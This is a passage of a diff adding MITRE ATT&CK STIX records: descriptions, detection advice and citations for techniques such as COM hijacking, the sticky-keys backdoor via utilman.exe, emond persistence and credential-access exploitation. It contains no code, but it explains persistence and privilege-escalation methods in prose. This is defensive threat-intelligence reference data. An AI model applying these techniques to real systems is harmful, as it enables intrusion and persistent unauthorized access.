"kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)(Citation: GNU Acct)(Citation: RHEL auditd)(Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Application control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5", + "created": "2020-01-14T01:35:00.781Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/014", + "external_id": "T1055.014" + }, + { + "source_name": "Backtrace VDSO", + "description": "backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020.", + "url": "https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/" + }, + { + "source_name": "Syscall 2014", + "description": "Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020.", + "url": "https://lwn.net/Articles/604515/" + }, + { + "source_name": "GNU Acct", + "description": "GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.", + "url": "https://www.gnu.org/software/acct/" + }, + { + "source_name": "RHEL auditd", + "description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.", + "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing" + }, + { + "source_name": "ArtOfMemoryForensics", + "description": "Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017." + }, + { + "source_name": "ELF Injection May 2009", + "description": "O'Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020.", + "url": "https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html" + }, + { + "source_name": "VDSO Aug 2005", + "description": "Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020.", + "url": "https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/" + }, + { + "source_name": "Chokepoint preload rootkits", + "description": "stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.", + "url": "http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Multiband Communication", + "description": "**This technique has been deprecated and should no longer be used.**\n\nSome adversaries may split communications between different protocols. There could be one protocol for inbound command and control and another for outbound data, allowing it to bypass certain firewall restrictions. The split could also be random to simply avoid data threshold alerts on any one communication.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) Correlating alerts between multiple communication channels can further help identify command-and-control behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--99709758-2b96-48f2-a68a-ad7fbd828091", + "created": "2017-05-31T21:30:32.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1026", + "external_id": "T1026" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:08.233Z", + "name": "Adversary-in-the-Middle", + "description": "Adversaries with privileged network access may seek to modify network traffic in real time using adversary-in-the-middle (AiTM) attacks. (Citation: Gabriel Sanchez October 2017) This type of attack allows the adversary to intercept traffic to and/or from a particular device on the network. If a AiTM attack is established, then the adversary has the ability to block, log, modify, or inject traffic into the communication stream. There are several ways to accomplish this attack, but some of the most-common are Address Resolution Protocol (ARP) poisoning and the use of a proxy. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) \n\nAn AiTM attack may allow an adversary to perform the following attacks: \n[Block Reporting Message](https://attack.mitre.org/techniques/T0804), [Spoof Reporting Message](https://attack.mitre.org/techniques/T0856), [Modify Parameter](https://attack.mitre.org/techniques/T0836), [Unauthorized Command Message](https://attack.mitre.org/techniques/T0855)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Conrad Layne - GE Digital" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [ + "Windows Registry: Windows Registry Key Modification", + "Process: Process Creation", + "Network Traffic: Network Traffic Flow", + "Service: Service Creation", + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0830", + "external_id": "T0830" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Gabriel Sanchez October 2017", + "description": "Gabriel Sanchez 2017, October Man-In-The-Middle Attack Against Modbus TCP Illustrated with Wireshark Retrieved. 2020/01/05 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/man-in-the-middle-attack-modbus-tcp-illustrated-wireshark-38095" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-18T17:23:22.591Z", + "name": "File Transfer Protocols", + "description": "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMB(Citation: US-CERT TA18-074A), FTP(Citation: ESET Machete July 2019), FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", + "created": "2020-03-15T16:16:25.763Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1071/002", + "external_id": "T1071.002" + }, + { + "source_name": "ESET Machete July 2019", + "description": "ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "US-CERT TA18-074A", + "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Component Object Model Hijacking", + "description": "The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "ENDGAME" + ], + "x_mitre_detection": "There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations replacing know binary paths with unknown paths. Even though some third party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\. (Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Autoruns Analysis" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9b52fca7-1a36-4da0-b62d-da5bd83b4d69", + "created": "2017-05-31T21:31:33.979Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1122", + "external_id": "T1122" + }, + { + "source_name": "Microsoft Component Object Model", + "description": "Microsoft. (n.d.). The Component Object Model. Retrieved August 18, 2016.", + "url": "https://msdn.microsoft.com/library/ms694363.aspx" + }, + { + "source_name": "GDATA COM Hijacking", + "description": "G DATA. (2014, October). COM Object hijacking: the discreet way of persistence. Retrieved August 13, 2016.", + "url": "https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence" + }, + { + "source_name": "Elastic COM Hijacking", + "description": "Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting Persistence & Evasion with the COM. Retrieved September 15, 2016.", + "url": "https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Accessibility Features", + "description": "Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nFor the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for the accessibility program (e.g., \"utilman.exe\"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the \"debugger\" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nOther accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)\n\n* On-Screen Keyboard: C:\\Windows\\System32\\osk.exe\n* Magnifier: C:\\Windows\\System32\\Magnify.exe\n* Narrator: C:\\Windows\\System32\\Narrator.exe\n* Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\n* App Switcher: C:\\Windows\\System32\\AtBroker.exe", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Paul Speulstra, AECOM Global Security Operations Center" + ], + "x_mitre_detection": "Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9b99b83a-1aac-4e29-b975-b374950551a3", + "created": "2017-05-31T21:30:26.946Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1015", + "external_id": "T1015" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/558.html", + "external_id": "CAPEC-558" + }, + { + "source_name": "FireEye Hikit Rootkit", + "description": "Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html" + }, + { + "source_name": "DEFCON2016 Sticky Keys", + "description": "Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to the Kingdom. Retrieved July 5, 2017.", + "url": "https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom" + }, + { + "source_name": "Tilbury 2014", + "description": "Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014.", + "url": "http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-15T11:45:21.555Z", + "name": "Exploitation for Credential Access", + "description": "Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. \n\nCredentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is `MS14-068`, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don't properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.(Citation: Bugcrowd Replay Attack)(Citation: Comparitech Replay Attack)(Citation: Microsoft Midnight Blizzard Replay Attack)\n\nSuch exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.(Citation: Storm-0558 techniques for unauthorized email access)\n\nExploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "John Lambert, Microsoft Threat Intelligence Center", + "Mohit Rathore" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Azure AD" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1212", + "external_id": "T1212" + }, + { + "source_name": "Bugcrowd Replay Attack", + "description": "Bugcrowd. (n.d.). Replay Attack. Retrieved September 27, 2023.", + "url": "https://www.bugcrowd.com/glossary/replay-attack/" + }, + { + "source_name": "Comparitech Replay Attack", + "description": "Justin Schamotta. (2022, October 28). What is a replay attack?. Retrieved September 27, 2023.", + "url": "https://www.comparitech.com/blog/information-security/what-is-a-replay-attack/" + }, + { + "source_name": "ADSecurity Detecting Forged Tickets", + "description": "Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.", + "url": "https://adsecurity.org/?p=1515" + }, + { + "source_name": "Storm-0558 techniques for unauthorized email access", + "description": "Microsoft Threat Intelligence. (2023, July 14). Analysis of Storm-0558 techniques for unauthorized email access. Retrieved September 18, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/" + }, + { + "source_name": "Microsoft Midnight Blizzard Replay Attack", + "description": "Microsoft Threat Intelligence. (2023, June 21). Credential Attacks. Retrieved September 27, 2023.", + "url": "https://twitter.com/MsftSecIntel/status/1671579359994343425" + }, + { + "source_name": "Technet MS14-068", + "description": "Microsoft. (2014, November 18). Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.", + "url": "https://technet.microsoft.com/en-us/library/security/ms14-068.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Emond", + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.\n\nThe rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)\n\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Ivan Sinyakov" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor emond rules creation by checking for files created or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd", + "created": "2020-01-24T15:15:13.426Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/014", + "external_id": "T1546.014" + }, + { + "source_name": "magnusviri emond Apr 2016", + "description": "Reynolds, James. (2016, April 7). What is emond?. Retrieved September 10, 2019.", + "url": "http://www.magnusviri.com/Mac/what-is-emond.html" + }, + { + "source_name": "xorrior emond Jan 2018", + "description": "Ross, Chris. (2018, January 17). Leveraging Emond on macOS For Persistence. Retrieved September 10, 2019.", + "url": "https://www.xorrior.com/emond-persistence/" + }, + { + "source_name": "sentinelone macos persist Jun 2019", + "description": "Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.", + "url": "https://www.sentinelone.com/blog/how-malware-persists-on-macos/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "One-Way Communication", + "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "created": "2020-03-14T22:45:52.963Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1102/003", + "external_id": "T1102.003" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Gather Victim Network Information", + "description": "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "created": "2020-10-02T15:45:17.628Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1590", + "external_id": "T1590" + }, + { + "source_name": "WHOIS", + "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.", + "url": "https://www.whois.net/" + }, + { + "source_name": 